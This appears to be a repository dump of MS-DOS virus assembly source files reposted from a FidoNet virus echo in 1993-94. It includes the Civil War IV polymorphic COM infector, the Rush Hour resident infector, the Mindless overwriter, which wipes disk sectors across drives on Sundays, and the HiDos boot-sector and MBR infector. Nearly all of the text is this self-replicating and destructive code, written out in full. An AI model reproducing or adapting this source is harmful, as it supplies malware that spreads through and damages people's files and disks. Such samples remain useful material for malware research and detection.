int 2Eh ;Pass command to command
;interpreter for execution
mov ax,4C00H ;Exit to DOS
int 21h
END_OF_CODE = $
STACK_HERE EQU END_OF_CODE + 512
CSEG ENDS
END START
;-+- FidoPCB v1.4 [NR]
; + Origin: Fred's Place (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

229
MSDOS/Virus.MSDOS.Unknown.vir36.asm Normal file
View File

@ -0,0 +1,229 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 26 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : CIVIL411.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 16:48)
;* To : Mike Nisbett
;* Subj : CIVIL411.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
;****************************************************************************
;* Civil War IV v1.1 (minor bugfix version) *
;* *
;* Assembled with Tasm 2.5 *
;* *
;* (c) 08-01-93 Dark Helmet, The Netherlands. *
;* The author takes no responsibilty for any damages caused by the virus *
;* *
;* This is a example virus with the TPE engine to teach you how to use *
;* the TPE engine. *
;* *
;*--------------------------------------------------------------------------*
;* *
;* Notes: *
;* *
;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
;* people who are killed in Yugoslavia. *
;* *
;* The text in the virus is taken from the song Civil War (hence the name) *
;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
;* *
;* The first name for the virus was NAVIGATOR II, because the virus is *
;* based on the NAVIGATOR virus (also written by me, a while back), but *
;* since I decided to put the songtext in it I renamed it to Civil War IV *
;* *
;* You need the TPE 1.3 engine to link this program. * *
;* *
;****************************************************************************
.model tiny
.radix 16
.code
extrn rnd_init:near
extrn rnd_get:near
extrn crypt:near
extrn tpe_top:near
org 100h
len equ offset tpe_top - begin
Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
Begin: call virus ; calculate delta offset
Virus: pop bp
sub bp,offset virus
mov dx,0fe00h ; DTA instellen
mov ah,1ah
int 21h
Restore_begin: call rnd_init ; init random generator
mov di,0100h
lea si,ds:[buffer+bp]
mov cx,06h
rep movsb
First: lea dx,[com_mask+bp] ;get first COM file
mov ah,04eh
xor cx,cx
int 21h
Open_file: mov ax,03d02h ;open for READ/WRITE
mov dx,0fe1eh
int 21h
mov [handle+bp],ax
xchg ax,bx
Read_date: mov ax,05700h ;store date/time for later
int 21h ;use
mov [date+bp],dx
mov [time+bp],cx
Check_infect: mov bx,[handle+bp] ;check if initials present in
mov ah,03fh ;file
mov cx,06h
lea dx,[buffer+bp]
int 21h
mov al,byte ptr [buffer+bp]+3 ;Compare initials
mov ah,byte ptr [buffer+bp]+4
cmp ax,[initials+bp]
jne infect_file ;if initials not present
;start infecting file
Close_file: mov bx,[handle+bp] ;close file
mov ah,3eh
int 21h
Next_file: mov ah,4fh ;get next COM file
int 21h ;in directorie
jnb open_file
jmp exit
Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
sub ax,03h
mov [lenght+bp],ax
mov ax,04200h ;goto begin of file
call move_pointer
Write_jump: mov ah,40h ;Write JUMP intruction
mov cx,01h
lea dx,[jump+bp]
int 21h
mov ah,40h ;Write JUMP offset
mov cx,02h
lea dx,[lenght+bp]
int 21h
mov ah,40 ;Write initials to check
mov cx,02h ;for infection later
lea dx,[initials+bp]
int 21h
mov ax,4202h ; move to end of file
call move_pointer ; for infection
;*****************************************************************************
; T P E *
;*****************************************************************************
Encrypt: push bp ; BP = delta offset
; push delta offset on stack
; for later use.
mov ax,cs ; Calculate worksegment
add ax,01000h
mov es,ax ; ES point to decrypt virus
lea dx,[begin+bp] ; DS:DX begin encryption
mov cx,len ; virus lenght
mov bp,[lenght+bp] ; decryption starts at this
add bp,103h ; point
xor si,si ; distance between decryptor
; and encrypted code is 0 bytes
call rnd_get ; AX = random value
call crypt ; encrypt virus
pop bp ; BP = delta offset
; get delta offset of stack
;******************************************************************************
; T P E - E N D *
;******************************************************************************
Write_virus: mov bx,[handle+bp]
mov ah,40h
int 21h
Restore_date: mov ax,05701h
mov bx,[handle+bp]
mov cx,[time+bp]
mov dx,[date+bp]
int 21h
Exit: mov ax,cs
mov ds,ax
mov es,ax
mov bx,0100h ; jump to start program
jmp bx
;----------------------------------------------------------------------------
move_pointer: mov bx,[handle+bp]
xor cx,cx
xor dx,dx
int 21h
ret
;----------------------------------------------------------------------------
v_name db "Civil War IV v1.1, (c) Jan '93 "
com_mask db "*.com",0
handle dw ?
date dw ?
time dw ?
buffer db 090h,0cdh,020h,044h,048h,00h
initials dw 4844h
lenght dw ?
jump db 0e9h,0
message db "For all i've seen has changed my mind"
db "But still the wars go on as the years go by"
db "With no love of God or human rights"
db "'Cause all these dreams are swept aside"
db "By bloody hands of the hypnotized"
db "Who carry the cross of homicide"
db "And history bears the scars of our Civil Wars."
writer db "[ DH / TridenT ]",00
end dummy
;-+- PPoint 1.86
; + Origin: - = [ Brainstorm BBS ++31 (0)20-6108189 ] = - (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/yx Extended memory swapping
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

313
MSDOS/Virus.MSDOS.Unknown.vir37.asm Normal file
View File

@ -0,0 +1,313 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 27 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : RUSHHOUR.DSM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Dr T , 2:283/718 (06 Nov 94 16:49)
;* To : Clif Jessop
;* Subj : RUSHHOUR.DSM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org
PAGE 72,132
TITLE Virus "RUSH HOUR" V1.0 (p) Foxi, 1986
NAME VIRUS
ABS0 SEGMENT AT 0
ORG 4*10h
VIDEO_INT DW 2 DUP (?) ; Video Interrupt
ORG 4*21h
DOS_INT DW 2 DUP (?) ; DOS Interrupt
ORG 4*24h
ERROR_INT DW 2 DUP (?) ; ERROR Interrupt
ABS0 ENDS
code SEGMENT
assume cs:code, ds:code, es:code
ORG 05Ch
FCB LABEL BYTE
DRIVE DB ?
FSPEC DB 11 DUP (' ') ; Filename
ORG 6Ch
FSIZE DW 2 DUP (?)
FDATE DW ? ; date of last modifcation
FTIME DW ? ; time of last mod
ORG 80h
DTA DW 128 DUP (?) ; Disk Transfer Area (DTA)
ORG 071Eh ; END OF THE NORMAL KEYBGR.COM
xor ax, ax
mov es, ax ; ES points to ABS0
assume es:ABS0
push cs
pop ds
mov ax, VIDEO_INT ; store old interrupt vectors
mov bx, VIDEO_INT+2
mov word ptr VIDEO_VECTOR, ax
mov word ptr VIDEO_VECTOR+2, bx
mov ax, DOS_INT
mov bx, DOS_INT+2
mov word ptr DOS_VECTOR, ax
mov word ptr DOS_VECTOR+2, bx
cli
mov DOS_INT, OFFSET VIRUS ; new DOS vector points to VIRUS
mov DOS_INT+2, cs
mov VIDEO_INT, OFFSET DISEASE ; video vector points to DISEASE
mov VIDEO_INT+2, cs
sti
mov ah, 0 ; Get system time
int 1Ah ; read TimeOfDay (TOD)
mov TIME_0, dx ; CX:DX = number of clock ticks since midnight
lea dx, VIRUS_ENDE
int 27h ; terminate program & remain resident (TSR)
VIDEO_VECTOR DD (?)
DOS_VECTOR DD (?)
ERROR_VECTOR DW 2 DUP (?)
TIME_0 DW ?
;
; VIRUS main program
;
; 1. System call AH=4BH?
; No: --> 2
; Yes: Test for KEYBGR.COM on specified drive
; Already infected?
; Yes :--> 3.
; No : Infection!
;
; 2. Jump to normal DOS
RNDVAL DB 'bfhg'
ACTIVE DB 0 ; not active
PRESET DB 0 ; first virus not active
DB 'A:'
FNAME DB 'KEYBGR COM'
DB 0
VIRUS PROC FAR
assume cs:code, ds:nothing, es:nothing
push ax
push cx
push dx
mov ah, 0 ; check if at least 15 minutes
int 1ah ; have elapsed since installation.
sub dx, TIME_0
cmp dx, 16384 ; 16384 ticks on the clock=15 minutes
jl $3
mov ACTIVE, 1 ; if so, activate virus
$3: pop dx
pop cx
pop ax
; disk access because of the DOS command
; "Load & execute program" ?
cmp ax, 4B00h
je $1
EXIT_1:
jmp DOS_VECTOR ; No: --> continue as normal
$1: push es ; ES:BX --> parameter block
push bx ; DS:DX --> filename
push ds ; save registers which will be needed
push dx ; for INT 21H (AH=4Bh)
mov DI, dx
mov DRIVE, 0 ; set the drive of the program
mov al, ds:[DI+1] ; to be executed
cmp al, ':'
jne $5
mov al, ds:[DI]
sub al, 'A'-1
mov DRIVE, al
$5: cld
push cs
pop ds
xor ax, ax
mov es, ax
assume ds:code, es:ABS0
mov ax, ERROR_INT ; ignore all disk "errors"
mov bx, ERROR_INT+2 ; with our own error routine
mov ERROR_VECTOR, ax
mov ERROR_VECTOR+2, bx
mov ERROR_INT, OFFSET ERROR
mov ERROR_INT+2, cs
push cs
pop es
assume es:code
lea dx, DTA ; DS:DX -> Disk Transfer Area (DTA)
mov ah, 1Ah ; SET DISK TRANSFER AREA ADDRESS
int 21h
mov bx, 11 ; transfer the filename
$2:
mov al, fname-1[bx] ; into File Control Block (FCB)
mov FSPEC-1[bx], al
DEC bx
JNZ $2
lea dx, FCB ; open file (for writing)
mov ah, 0FH
int 21H
cmp al, 0
jne EXIT_0 ; file does not exist --> end
mov BYTE PTR FCB + 20h, 0
mov ax, FTIME ; file already infected?
cmp ax, 4800h
je EXIT_0 ; YES --> END
mov PRESET, 1 ; (All copies are virulent !)
mov SI, 100H ; write the virus in the file
$4:
lea DI, DTA
mov cx, 128
REP MOVSB
lea dx, FCB ; DS:DX -> opened FCB
mov ah, 15h ; SEQUENTIAL WRITE TO FCB FILE
int 21h
cmp SI, OFFSET VIRUS_ENDE
jl $4
mov FSIZE, OFFSET VIRUS_ENDE - 100H
mov FSIZE+2, 0 ; set correct file size
mov FDATE, 0AA3h ; set correct date (3-5-86)
mov FTIME, 4800h ; set time (09:00:00)
lea dx, FCB ; close file
mov ah, 10h
int 21h
xor ax, ax
mov es, ax
assume es:ABS0
mov ax, ERROR_VECTOR ; reset the error interrupt
mov bx, ERROR_VECTOR+2
mov ERROR_INT, ax
mov ERROR_INT+2, bx
EXIT_0:
pop dx ; restore the saved registers
pop ds
pop bx
pop es
assume ds:nothing, es:nothing
mov ax, 4B00h ; "EXEC" - LOAD AND EXECUTE PROGRAM
jmp DOS_VECTOR ; normal function execution
VIRUS ENDP
ERROR PROC FAR
IRET ; simply ignore all errors...
ERROR ENDP
DISEASE PROC FAR
assume ds:nothing, es:nothing
push ax ; Save registers
push cx
test PRESET, 1
jz EXIT_2
test ACTIVE, 1
jz EXIT_2
IN al, 61h ; Enable speak (Bit 0 := 0)
AND al, 0feh
OUT 61h, al
mov cx, 3 ; index loop cx
NOISE: ; generate Noise
mov al, RNDVAL
xor al, RNDVAL + 3
SHL al, 1
SHL al, 1
RCL WORD PTR RNDVAL, 1
RCL WORD PTR RNDVAL+2, 1
mov ah, RNDVAL ; output some bit
and ah, 2 ; of the feedback
IN al, 61h ; shift register
and al, 0FDh ; --> noise from speaker
OR al, ah
OUT 61H, al
LOOP NOISE
and al, 0FCh ; turn speaker off
OR al,1
OUT 61H, al
EXIT_2:
pop cx
pop ax
jmp VIDEO_VECTOR ; jump to normal VIDEO routine ...
DISEASE ENDP
DB 'This program is a VIRUS program.'
DB 'Once activated it has control over all'
DB 'system devices and even over all storage'
DB 'media inserted by the user. It continually'
DB 'copies itself into uninfected operating'
DB 'systems and thus spreads uncontrolled.'
DB 'The fact that the virus does not destroy any'
DB 'user programs or erase the disk is merely due'
DB 'to a philanthropic trait of the author......'
ORG 1C2Ah
VIRUS_ENDE LABEL BYTE
code ends
end
;-+- Concord/QWK O.O1 Beta-7
; + Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/os,/o,/op,/oiObject code: standard, standard w/overlays, Phar Lap, or IBM
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

258
MSDOS/Virus.MSDOS.Unknown.vir38.asm Normal file
View File

@ -0,0 +1,258 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 28 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MINDLESS.DSM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 16:49)
;* To : Hans Schotel
;* Subj : MINDLESS.DSM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org
; The Mindless V1.0 Virus
;
; Type: *.COM Overwriter
;
; Programmer: Natas Kaupas
; Notes:
;
; Read the texts that come with this for all of the necessary
; info...if you've got any questions contact me on any YAM Dist. Sites.
;
; I Couldn't Have Made This Without:
;
; Soltan Griss -Kode4
; Data Disruptor -encrypted part
; Mr. Mike -typematic delay thing
; And Everyone I Forgot!
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
MINDL proc far
start label near
db 0E9h,00h,00h
vstart equ $
mov cx,09EBh ;debug killer
mov ax,0FE05h ;
jmp $-2 ;
add ah,03Bh ;
jmp $-10 ;
push ds ;save old data segment
sub ax,ax ;put zero in ax
push ax ;save it on stack
mov ah,2ah ;get date
int 21h
cmp al,0 ;is it a Sunday?
jne rater ;no...don't format then
doom:
mov ax,3301h ;turn off ^C Check
xor dl,dl ;0
int 21h
mov cx,lident ;this all has to do with the encrypted
mov si,offset ident ;message
mov di,offset dest ;
doshit:
mov al,ds:[si] ;unencrypt message
mov temp,al ;
xor byte ptr ds:[temp],01h ;
mov al,temp ;
mov [di],al ;
inc si ;
inc di ;
loop doshit ;loop back and finish it
doomb:
cmp drive,27 ;format all drives
jge boot ;done...then end (boot)
pushf ;push flags on
mov al,drive ;find drive
mov cx,sectors ;find sectors
mov dx,0 ;start at sector 0
mov bx,offset dest ;write encrypted message
int 26h ;format
popf ;pop flags off
inc drive ;go up to next drive
jmp doomb ;repeat
;this was originally going to boot...but for some reason it couldn't format in
;time (before the boot), so it didn't format...oh well.
boot:
mov dl,2ch ;get system time
int 21h
and dl,0Fh ;AND 100th seconds by 0Fh
or dl,dl ;0?
jz locker ;yes..then lock up system
mov cx,1980 ;date, 1980
mov dx,0 ;mon/day, 0
mov ah,2Bh ;set date
int 21h
mov cx,0 ;hrs/min, 0
mov dx,0 ;sec, 0
mov ah,2Dh ;set time
int 21h
mov ax,3301h ;turn ^C Check back on
mov dl,1 ;1
int 21h
mov ax,4c00h ;end with error message 00
int 21h
locker:
jmp $ ;lock up computer
rater:
mov al,dl
mov dl,0c0h ;unkown ms, really grinds on mine though!
jz valid ;it must be around 15ms
;which is slow considering default is 9ms
;and most floppies can actually go under 6ms
valid:
push ds ;Save the data segment
mov bx,78h ;point to pointer for floppy drive tables
mov ax,0
mov ds,ax ;set to segment 0
mov ax,[bx] ;get the pointer
mov bx,ax ;into the bx register
mov al,[bx] ;now get the present step rate
and al,0fh ;remove the old step rate
or al,dl ;put in the new step rate
mov [bx],al ;and put it back where it goes
mov ah,0 ;now call on the BIOS to
int 13h ;reload the set floppy disk controller
pop ds ;Reset the Data Segment
go_on:
push ds ;save present data segment
mov bx,78h ;point to pointer for floppy drive tables
mov ax,0
mov ds,ax ;set to segment 0
mov ax,[bx] ;get the pointer
mov bx,ax ;into the bx register
mov al,[bx] ;now get the step rate
pop ds
push ax ;save the step rate on the stack
typematic:
mov bl,repeat ;get the parameters
mov bh,init ;
mov ax,305h ;set typematic rate and delay
int 16h ;
xor al,al ;errorlevel = 0
n_start: mov ah,4Eh ;Find first Com file in directory
mov dx,offset filename ;use "*.com"
int 21h
Back:
mov ah,43h ;get rid of read only protection
mov al,0 ;
mov dx,9eh ;
int 21h ;
mov ah,43h ;
mov al,01 ;
and cx,11111110b ;
int 21h ;
mov ax,3D01h ;Open file for writing
mov dx,9Eh ;get file name from file data area
int 21h
mov bx,ax ;save handle in bx
mov ah,57h ;get time date
mov al,0
int 21h
push cx ;put in stack for later
push dx
mov dx,100h ;Start writing at 100h
mov cx,(vend-vstart) ;write ?? bytes
mov ah,40h ;Write Data into the file
int 21h
pop dx ;Restore old dates and times
pop cx
mov ah,57h
mov al,01h
int 21h
mov ah,3Eh ;Close the file
int 21h
mov ah,4Fh ;Find Next file
int 21h
jnc Back
done:
int 20h ;Terminate Program
V_Length equ vend-vstart
drive db ?
sectors dw 456
filename db "*.c*",0
ident db "ZXntofrudsr!@f`horu!Lb@ggdd\!,O@U@R!J@TQ@R",13,10
db "Uid!Lhoemdrr!Whstr!w0/1!",13,10
;encrypted message:
;ident db "[Youngsters Against McAffee] -NATAS KAUPAS",13,10
; db "The Mindless Virus v1.0 ",13,10
lident equ $-ident
dest db [lident-1/2] dup (?)
temp db 0
repeat equ 250
init equ 0
mindl endp
vend equ $
seg_a ends
end start
;-+- GoldED/386 2.50.B1016+
; + Origin: ViRUS PaRk BbS >916< 387-6159 24HouRs (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

246
MSDOS/Virus.MSDOS.Unknown.vir39.asm Normal file
View File

@ -0,0 +1,246 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 29 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HIDOS.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:50)
;* To : Doug Bryce
;* Subj : HIDOS.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
NAME boot
PAGE 55,132
TITLE FILE UTIL
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
org 100h
main: jmp over
db '['
id db 'HiDos]',0
by db 'By Apache',0
over: xor ax,ax
mov ds,ax
cli
mov ss,ax
mov sp,7c00h
sti
mov ax,ds:[004eh]
mov word ptr ds:[int13+7b02h],ax
mov ax,ds:[004ch]
mov word ptr ds:[int13+7b00h],ax
mov ax,ds:[0413h]
dec ax
dec ax
mov ds:[0413h],ax
mov cl,06h
shl ax,cl
mov es,ax
mov word ptr ds:[bigj+7b02h],es
mov ax,offset jumpt
mov word ptr ds:[bigj+7b00h],ax
mov cx,0400h
push cs
pop ds
mov si,7c00h
mov di,0100h
cld
repz
movsb
push cs
pop ds
jmp cs:[bigj+7b00h]
jumpt: push cs
pop ds
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hdone
mov bx,0300h
mov cx,0001h
mov dx,0080h
push cs
pop es
call hdread
cmp ds:[0304h],'iH'
jz hdone
mov bx,0300h
mov cx,0007h
mov dx,0080h
call hdwrit
mov si,04beh
mov di,02beh
mov cx,0042h
cld
repz
movsb
mov byte ptr ds:[drive],80h
mov bx,0100h
mov cx,0001h
mov dx,0080h
call hdwrit
mov byte ptr ds:[drive],00h
hdone: xor ax,ax
mov word ptr cs:[boot+2],ax
mov es,ax
push cs
pop ds
mov ax,0201h
mov bx,7c00h
mov word ptr ds:[boot],bx
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hload
mov cx,0003h
mov dx,0100h
jmp fload
hload: mov cx,0007h
mov dx,0080h
fload: mov di,'rv'
int 13h
mov si,offset drive
mov byte ptr cs:[si],00h
xor ax,ax
mov es,ax
mov ds,ax
mov ax,offset nint13
mov ds:[004ch],ax
mov ds:[004eh],cs
push cs
pop ds
jmp cs:[boot]
hdwrit: mov ax,0301h
mov di,'rv'
jmp xx4
hdread: mov ax,0201h
mov di,'rv'
xx4: int 13h
ret
nint13: cmp di,'rv'
jz iv13
cmp ah,02h
jnz wcheck
cmp cl,01h
jnz wcheck
cmp dh,00h
jnz wcheck
cmp dl,80h
jz check1
cmp dl,00h
jnz wcheck
check1: push ax
push bx
push cx
push dx
push ds
push es
push di
mov bx,0300h
push cs
pop es
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz redirect
jmp iflopd
redirect: cmp dl,80h
jnz rdirfl
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0007h
jmp a13
rdirfl: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0003h
mov dx,0100h
a13: mov ax,0201h
iv13: jmp v13
wcheck: cmp ah,03h
jnz v13
cmp dl,00h
jnz v13
push ax
push bx
push cx
push dx
push ds
push es
push di
push cs
pop es
mov bx,0300h
mov cx,0001h
xor dx,dx
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz iflopd
mov cx,0003h
mov dx,0100h
mov bx,0300h
call hdwrit
mov bx,0100h
xor dx,dx
mov cx,0001h
call hdwrit
iflopd: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
v13: db 0eah
int13 dd 0h
drive db 0h
bigj dd 0h
boot dd 0h
code ends
end main
;-+- GEcho 1.10+
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/i Initialize all segments
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

220
MSDOS/Virus.MSDOS.Unknown.vir40.asm Normal file
View File

@ -0,0 +1,220 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 30 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : MINDLESS.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Fred Lee, 2:283/718 (06 Nov 94 16:51)
;* To : Gilbert Holleman
;* Subj : MINDLESS.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org
;
mindless segment byte
assume cs:mindless,ds:mindless,ss:mindless
org 100h
victem equ 09Eh
yam proc near
jmp virus_fix ;location of victem name
yam endp
virus_fix proc near
;attempt crashing debugger
mov cx,09ebh ;fake command
